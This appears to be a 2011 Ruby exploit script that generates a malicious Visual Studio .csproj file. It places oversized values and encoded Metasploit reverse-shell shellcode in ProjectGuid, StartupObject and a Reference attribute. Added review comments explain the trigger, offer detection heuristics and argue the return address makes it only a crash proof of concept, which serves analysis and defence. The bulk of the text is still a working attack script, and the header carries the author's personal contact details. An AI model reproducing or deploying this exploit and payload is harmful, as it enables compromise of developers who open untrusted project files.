MS Visual Studio 9.0 .csproj Buffer Overflow
Posted on 26 February 2011
#!/usr/bin/ruby
###
# Title : MS Visual Studio 9.0 (.csproj) Stack Buffer Overflow
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com
# Home : HMD/AM (30008/04300) - Algeria -(00213555248701)
# Twitter page : twitter.com/kedans
# Tested on : windows XP SP3 Français & Arabic
# Target : Microsoft Visual Studio v 9.0 / CSharp Project /
###
# Note : This Exploit BOF is Special Greets to Member ' Overfolw ' From sec4ever.com
#
# NOTE(review): What this script actually does, end to end: it builds one
# string of MSBuild project XML in which three fields carry oversized values
# (ProjectGuid, StartupObject and a Reference Include attribute) and writes it
# to KedAns.csproj in the current directory. It performs no network activity
# itself; the only process activity is the three cosmetic system() calls
# below. The trigger, per the "Target" line above, is a user opening the
# generated project in Visual Studio 9.0 - the classic untrusted-project-file
# exposure - so the defensive control is on what project files get opened,
# not on anything this script does at generation time.
#
# NOTE(review): Detection heuristic grounded in the values below: a real
# ProjectGuid is a 36-character GUID, whereas this one is 1001 characters
# (333 + "-" + 333 + "-" + 333), and a Reference Include attribute that is
# hundreds of bytes long does not occur in legitimate project files. Either
# property is sufficient to flag a file like this on ingest or in an
# email/download gateway that inspects MSBuild XML.
#
#START SYSTEM /root@MSdos/ :
# NOTE(review): title/color/cls are cmd.exe builtins - these only have an
# effect when the script is run from a Windows console; elsewhere they fail
# harmlessly.
system("title KedAns-Dz")
system("color 1e")
system("cls")
# Banner printer. NOTE(review): defined but never called anywhere in this
# script, so nothing below ever prints it.
def Usage()
puts " [!] MS Visual Studio 9.0 (.csproj) "
puts "[!] Stack Buffer Overflow "
puts "[!] Author: KedAns-Dz "
puts "[!] E-mail: ked-h@hotmail.com "
end
# Payload Parameter (http://www.metasploit.com)
# windows/shell_reverse_tcp - 739 bytes
# Encoder: x86/alpha_mixed
# LHOST=127.0.0.1, LPORT=4444, ReverseConnectRetries=5, =>
# NOTE(review): Per the header just above, the embedded payload is a reverse
# shell whose LHOST is the loopback address, i.e. as shipped it would only
# connect back to the victim host itself; the header is the sole source for
# that claim, the bytes are not decoded here.
payload = "x56x54x58x36x33x30x56x58x48x34x39x48x48x48" +
"x50x68x59x41x41x51x68x5ax59x59x59x59x41x41" +
"x51x51x44x44x44x64x33x36x46x46x46x46x54x58" +
"x56x6ax30x50x50x54x55x50x50x61x33x30x31x30" +
"x38x39x49x49x49x49x49x49x49x49x49x49x49x49" +
"x49x49x49x49x49x37x51x5ax6ax41x58x50x30x41" +
"x30x41x6bx41x41x51x32x41x42x32x42x42x30x42" +
"x42x41x42x58x50x38x41x42x75x4ax49x4bx4cx4d" +
"x38x4ex69x47x70x43x30x45x50x45x30x4dx59x4a" +
"x45x45x61x48x52x43x54x4ex6bx50x52x50x30x4c" +
"x4bx51x42x46x6cx4ex6bx46x32x46x74x4cx4bx50" +
"x72x46x48x46x6fx4fx47x43x7ax51x36x46x51x49" +
"x6fx46x51x4fx30x4ex4cx47x4cx43x51x43x4cx43" +
"x32x44x6cx47x50x4fx31x48x4fx46x6dx43x31x49" +
"x57x48x62x4cx30x51x42x42x77x4cx4bx50x52x42" +
"x30x4cx4bx43x72x45x6cx46x61x4ax70x4cx4bx43" +
"x70x43x48x4ex65x4bx70x42x54x50x4ax45x51x48" +
"x50x46x30x4ex6bx50x48x45x48x4ex6bx51x48x51" +
"x30x45x51x48x53x48x63x47x4cx43x79x4ex6bx47" +
"x44x4ex6bx46x61x4bx66x50x31x4bx4fx44x71x4f" +
"x30x4ex4cx49x51x4ax6fx46x6dx46x61x4fx37x46" +
"x58x4dx30x42x55x4ax54x46x63x43x4dx4cx38x47" +
"x4bx51x6dx44x64x44x35x49x72x43x68x4cx4bx50" +
"x58x45x74x47x71x48x53x51x76x4ex6bx46x6cx42" +
"x6bx4cx4bx42x78x47x6cx45x51x48x53x4ex6bx45" +
"x54x4cx4bx47x71x48x50x4fx79x42x64x44x64x47" +
"x54x51x4bx51x4bx43x51x50x59x43x6ax46x31x4b" +
"x4fx4dx30x50x58x43x6fx43x6ax4cx4bx45x42x48" +
"x6bx4ex66x43x6dx42x48x50x33x44x72x45x50x43" +
"x30x51x78x42x57x42x53x46x52x43x6fx50x54x43" +
"x58x42x6cx44x37x44x66x45x57x49x6fx48x55x48" +
"x38x4cx50x47x71x45x50x47x70x47x59x4bx74x51" +
"x44x42x70x42x48x44x69x4dx50x42x4bx43x30x49" +
"x6fx48x55x50x50x42x70x50x50x42x70x47x30x42" +
"x70x43x70x50x50x43x58x48x6ax44x4fx49x4fx4d" +
"x30x49x6fx4bx65x4ex69x48x47x42x48x43x4fx45" +
"x50x43x30x47x71x43x58x43x32x45x50x44x51x43" +
"x6cx4ex69x4ax46x51x7ax42x30x51x46x43x67x42" +
"x48x4dx49x4ex45x51x64x51x71x49x6fx4ex35x50" +
"x68x42x43x42x4dx42x44x47x70x4cx49x48x63x51" +
"x47x51x47x51x47x50x31x4bx46x51x7ax47x62x51" +
"x49x50x56x4dx32x49x6dx50x66x4fx37x42x64x46" +
"x44x45x6cx47x71x43x31x4cx4dx50x44x51x34x42" +
"x30x4ax66x43x30x43x74x50x54x42x70x43x66x43" +
"x66x51x46x47x36x46x36x42x6ex50x56x46x36x42" +
"x73x43x66x50x68x44x39x48x4cx47x4fx4bx36x4b" +
"x4fx48x55x4cx49x4bx50x50x4ex42x76x43x76x49" +
"x6fx50x30x42x48x43x38x4cx47x47x6dx43x50x49" +
"x6fx4ex35x4fx4bx4ax50x4dx65x4dx72x51x46x51" +
"x78x4dx76x4ex75x4fx4dx4dx4dx4bx4fx48x55x47" +
"x4cx46x66x43x4cx45x5ax4bx30x49x6bx49x70x43" +
"x45x45x55x4dx6bx51x57x44x53x43x42x42x4fx51" +
"x7ax47x70x46x33x4bx4fx49x45x41x41"
#_ End Payload _
# Parameter OverFlow =>
# Three 333-character runs separated by "-" (1001 characters total) used as
# the ProjectGuid value below.
amt = "A" * 333 + "-"
bmt = "B" * 333 + "-"
cmt = "C" * 333
buff = amt + bmt + cmt # Buffer GID
# NOTE(review): 0x000004b0 packed little-endian. The comment claims this is a
# "jump to ESP" gadget, but an address in the first page of the process
# address space is not a mapped code location on Windows, and no module
# offset or base is shown. Taken at face value this listing is a
# crash/denial-of-service PoC rather than a demonstrated code-execution
# chain; treat the "Stack Buffer Overflow" title accordingly when triaging.
ret = [0x000004b0].pack('V') # Jump to ESP - from MSVS.ORDesigner.DslPackage.dll
junk = "x4b" * 500 # junk
padd = "x90" * 30 # Padding
# KedAns = [Payload_shell][RET: 0x000004b0][Padding][Junk]
KedAns = payload + ret + padd + junk
# Parameter Evil File =>
# NOTE(review): The project XML is not well-formed: the </ItemGroup> after the
# second <Reference> closes the only open ItemGroup, so the trailing
# </ItemGroup> after </Compile> has no matching opener. Any conforming XML
# parser rejects the document before MSBuild semantics are reached, which is
# another reason the file is easy to distinguish from a real project.
# The oversized values are placed in ProjectGuid (buff), StartupObject (junk)
# and the second Reference Include attribute (KedAns).
ked = %Q{<Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" ToolsVersion="3.5">
<PropertyGroup>
<Configuration Condition=" '$(Configuration)' == '' ">Debug</Configuration>
<Platform Condition=" '$(Platform)' == '' ">AnyCPU</Platform>
<SchemaVersion>2.0</SchemaVersion>
<ProjectGuid>{#{buff}}</ProjectGuid>
<OutputType>Library</OutputType>
<StartupObject> #{junk} </StartupObject>
</PropertyGroup>
<PropertyGroup Condition=" '$(Configuration)|$(Platform)' == 'Debug|AnyCPU' ">
<DebugSymbols>true</DebugSymbols>
<Optimize>false</Optimize>
<OutputPath>.inDebug</OutputPath>
</PropertyGroup>
<ItemGroup>
<Reference Include="System"/>
<Reference Include="#{KedAns}"/>
</ItemGroup>
<Compile Include="KedAns-Dz.cs">
<SubType>Code</SubType>
</Compile>
</ItemGroup>
</Project>
}
# _ End Parameter File _
# >> Creating ...
# Writes the project XML to KedAns.csproj in the current working directory
# (binary mode) and closes the handle explicitly. This is the script's only
# observable side effect beyond the console commands above.
evil = File.new("KedAns.csproj","wb") # Evil file (CSharp.Project)
evil.write(ked)
evil.close
#================[ Exploited By KedAns-Dz * HST-Dz * ]=========================
# GreetZ to : Islampard * Dr.Ride * Zaki.Eng * BadR0 * NoRo FouinY * Red1One
# XoreR * Mr.Dak007 * Hani * TOnyXED * Fox-Dz * Massinhou-Dz ++ all my friends ;
# > Algerians < [D] HaCkerS-StreeT-Team [Z] > Hackers <
# My Friends on Facebook : Nayla Festa * Dz_GadlOl * MatmouR13 ...all Others
# 4nahdha.com : TitO (Dr.Ride) * MEN_dz * Mr.LAK (Administrator) * all members ...
# sec4ever.com members Dz : =>>
# Ma3sTr0-Dz * Indoushka * MadjiX * BrOx-Dz * JaGo-Dz ... all Others
# hotturks.org : TeX * KadaVra ... all Others
# Kelvin.Xgr ( kelvinx.net)
#===========================================================================
